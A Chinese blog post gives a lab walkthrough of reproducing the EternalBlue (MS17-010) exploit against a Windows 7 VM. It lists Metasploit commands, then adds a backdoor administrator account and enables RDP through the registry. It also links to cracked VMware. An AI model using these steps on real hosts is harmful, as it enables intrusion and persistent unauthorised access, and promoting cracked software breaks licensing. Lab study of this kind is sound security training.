漏洞复现 | MS17-010*(永恒之蓝)漏洞复现

已于 2023-03-24 14:41:48 修改
阅读量2.1k 收藏 50
点赞数 12
分类专栏: 漏洞复现 文章标签: 网络 windows web安全 网络安全
于 2023-03-24 14:33:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/made_cola/article/details/129749661
版权

MS17-010*(永恒之蓝)漏洞复现

目录

一、漏洞概述

1、漏洞介绍

2、漏洞原理

3、影响版本

二、实验条件

1、查看IP

2、测试主机网络连通性

三、漏洞复现

1、主机发现

2、使用MSF的永恒之蓝模块

3、使用MS17-010扫描模块,对靶机进行扫描

4、使用ms17-010攻击模块,对靶机进行攻击

5、得到靶机shell

6、对靶机shell进行控制

四、实验所用设备下载

一、漏洞概述

1、漏洞介绍

  • 永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成 。勒索病毒的肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。据统计,全球100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。

2、漏洞原理

  • 永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

3、影响版本

  • 目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

二、实验条件

  • 靶机(win7):192.168.112.133

  • 攻击机(kali):192.168.112.128

  • 实验条件:两台机子可以相互ping通,并且靶机(无补丁)开启了445端口,防火墙是关闭的!

1、查看IP

  • 首先,开启kali和win7,查看两台主机的ip地址

  • kali:

  • win7

2、测试主机网络连通性

  • 由此得来,可以ping通,(如果ping不通,测试两边主机的网络连接和win7的防火墙)

三、漏洞复现

1、主机发现

  • 登录kali,使用nmap探测本网段主机

  • nmap 192.168.112.133/24        

  • 可得,目标主机开放了135、139、445、1688、3389端口

  • 而永恒之蓝利用的是445端口的SMB服务,操作系统溢出漏洞

2、使用MSF的永恒之蓝模块

  • 打开MSF

    • msfconsole        #启动msf

  • 搜索ms17-010 代码:

    • search ms17_010      #搜索ms17-010

  • 这里可以得到一些工具,其中

    • auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块,

    • exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块

  • 一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

3、使用MS17-010扫描模块,对靶机进行扫描

  • use auxiliary/scanner/smb/smb_ms17_010
#使用模块
  • set rhosts 192.168.112.133
#设置目标ip或网段

  • 出现漏洞

4、使用ms17-010攻击模块,对靶机进行攻击

  • use exploit/windows/smb/ms17_010_eternalblue
#使用模块进行攻击
  • set rhosts 192.168.112.133
#设置目标ip

    • 小贴士:可以用以下代码查看设置选项

    • show options

  • 攻击完成

5、得到靶机shell

  • shell

  • 测试靶机连通性

    • 输入:chcp 65001 可有效解决乱码问题。

6、对靶机shell进行控制

  • 创建新用户

    • net user         #查看所有用户
whoami /user     #查看当前用户的SID
net user hacker 123456 /add
#创建用户并设置密码"123456"

  • 将用户添加至管理员组

    • net localgroup administrators hacker /add
#将用户添加至管理员组

  • 开启远程桌面功能

    • 查看3389端口状态

    • netstat -ano        #查看开放了哪些端口

      • 如图所示并没有开启

      • REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 
#开启3389端口

      • 已开启

  • 远程桌面链接靶机(命令要在kail下输入)

    • rdesktop 192.168.112.133:3389
#通过3389端口开启远程桌面

    • 登陆成功

四、实验所用设备下载

  • windows7以及kali镜像文件、vmware16(附带破解)已放置在网盘链接中,请自行下载
  • 也可在评论区留言或私信我哦
  • 感谢支持!!!!!!!
  •  链接 
    • 链接:https://pan.baidu.com/s/1n_elmgr3aKBKf6x-mK51Uw 

提取码:gkkg 

--来自百度网盘超级会员V3的分享

tokel
关注
  • 12
    点赞
  • 50
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
漏洞复现MS17-010漏洞永恒之蓝复现
m0_53223419的博客
01-15 365
MS17-010漏洞复现,对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
网络安全 基础之 Windows漏洞复现MS17-010永恒之蓝
weixin_60888404的博客
06-01 2290
Windows经典漏洞 永恒之蓝复现
MS17-010永恒之蓝漏洞复现
weixin_64809022的博客
06-22 330
smb协议 永恒之蓝
利用MSF工具对MS17-010进行漏洞复现
weixin_63200026的博客
07-07 404
关于MS17-010永恒之蓝漏洞的实验,使用MSF进行漏洞复现
MS17_010永恒之蓝漏洞复现
qq_73722777的博客
12-10 444
使用ms17-010漏洞的一点体会
ms17-010漏洞复现
q996966912的博客
01-23 831
[漏洞复现] MS17-010 基于"永恒之蓝"实现Windows Getshell 漏洞复现环境 Kali Linux 2017.03 + Windows 7 sp1 攻击机:Kali Linux (ip:172.16.70.216) 靶机:Windows 7 sp1 (ip:172.16.70.199) 实验流程 ①登录Kali Linux,进入MSF框架,搜索ms17-010代码 ...
MS17-010漏洞复现
weixin_30493401的博客
02-10 199
攻击机:192.168.148.132kali linux2018.2 x64 靶机:192.168.1.129 win7 x64 首先用msfconsole的smb模块扫描,看看是否有漏洞 use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.1.129 (目标主机) Host is likely V...
MS17-010永恒之蓝漏洞复现与分析
m0_74887243的博客
01-15 499
MS17-010永恒之蓝漏洞复现
ms17-010 (永恒之蓝)漏洞复现及利用+Wireshark抓包分析
7Riven's blog
12-03 5731
1.实验环境 攻击机:Kali 1)攻击工具:msf 2)分析工具:wireshark 3)IP地址:192.168.109.154(自动获取,NAT模式) 靶 机:Windows7 1)版本 2)开启网络共享(SMB协议) 3)关闭防火墙 4)IP地址:192.168.109.132(自动获取,NAT模式) 2.测试攻击机与靶机的连通性 3.数据库配置...
漏洞复现篇之ms17-010永恒之蓝
sekiro2021的博客
04-05 1698
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。
复现ms17-010漏洞
hk_hkl的博客
05-20 514
实操系列
ms17-010复现
qq_43398810的博客
03-07 1099
ms17-010复现 攻击机kali IP :192.168.70.31 目标机win7 IP:192.168.70.16 打开kali 的msf 输入search ms17-010 查询这个漏洞 选择攻击模块: use exploit/windows/smb/ms17_010_eternalblue 将目标IP 输入进去: set RHOST 目标 set RHOST 192.168...
MS17-010复现
m0_50036713的博客
06-04 528
MS17-010复现
ms17_010复现
weixin_43736033的博客
01-14 306
利用的是NSA爆出来的工具箱 攻击机IP:10.1.6.154 靶机IP :10.1.6.153 靶机系统 : windows7 x64 Target ip : 设置目标 IP 10.1.6.153 Callback IP: 设置本地 IP 10.1.6.154 Use Redirection:设置重定向 no 设置日志目录 : C:\logs 设置项目名称 Fb > ...
MS17-010永恒之蓝漏洞复现
longanquan的博客
08-18 349
本来不想写这篇博客的,这个漏洞现在几乎不存在了,只有个别用户实在是不懂安全,至今还在用存在这个漏洞windows7系统,也没有下载补丁,Windows7系统现在也不更新了,但是也不排除还有一部分忠实粉丝喜欢Windows7这个系统。还有一个原因是因为我上一篇写了“永恒之黑”,对于我这个“强迫症”的人来说,一家人就应该整整齐齐的。简单写写大家看个热闹就行。 “永恒之蓝”是2017年报出来的Windows系统SMB服务的漏洞,影响的系统有Windows7、Windows server 2008。主要是Wind
【小白学习记】漏洞复现验证篇-ms17-010
最新发布
BeCareful0的博客
08-15 323
MS17-010漏洞出现在Windows SMB v1中,具体是在内核态函数srv!SrvOs2FeaListToNt处理FEA(File Extended Attributes)转换时发生的缓冲区溢出。这个漏洞允许攻击者通过发送特殊设计的消息到SMBv1服务器,从而执行远程代码。该漏洞影响所有使用SMBv1的Windows系统,特别是那些未安装补丁的系统。根据微软的安全公告,MS17-010在2017年3月14日发布,旨在修复多个SMBv1中的漏洞,其中最严重的漏洞可能导致远程代码执行(RCE)。
永恒之蓝漏洞复现测试
m0_60547686的博客
08-12 402
永恒之蓝MS17-010漏洞复现及利用 一、什么是永恒之蓝永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。 SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。 二、复现
永恒之蓝EternalBlue(ms17-010复现
yiyiiyiy的博客
11-24 5206
前言 漏洞描述Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,电脑只要开机,攻击者就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。漏洞复现 环境搭建角色 系统版本 IP 备注 靶机 windows 7 (x64) 192.168.198.131 打开445端口,关闭防火
学习永恒之蓝复现的收获
09-01
学习永恒之蓝复现的收获包括以下几点: 首先,在复现过程中,你可以学习到如何利用已有的工具,例如Kali上的工具,来进行复现。这些工具已经为复现做好了准备,帮助你更好地理解攻击的过程和原理,并加深对Kali的使用。 其次,你还可以通过学习永恒之蓝漏洞的利用过程,了解到具体的漏洞利用方法和技巧。永恒之蓝是一种由美国国家安全局开发的漏洞利用程序,针对微软漏洞编号ms17-010。通过学习这个漏洞的利用工具,你可以更深入地了解TCP 445端口(文件分享协议)的攻击方式,以及如何传播病毒木马。 最后,学习永恒之蓝复现还可以帮助你加深对渗透攻击的理解。在复现过程中,你可能会接触到一些以前没见过的命令和技术,这有助于扩展你的知识面,并提升你在渗透测试领域的技能水平。 综上所述,学习永恒之蓝复现的收获包括对Kali工具的深入理解和熟练使用,对漏洞利用方法和技巧的学习,以及对渗透攻击的更深入理解和技能提升。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [永恒之蓝漏洞复现](https://blog.csdn.net/weixin_54584489/article/details/122374341)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tokel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值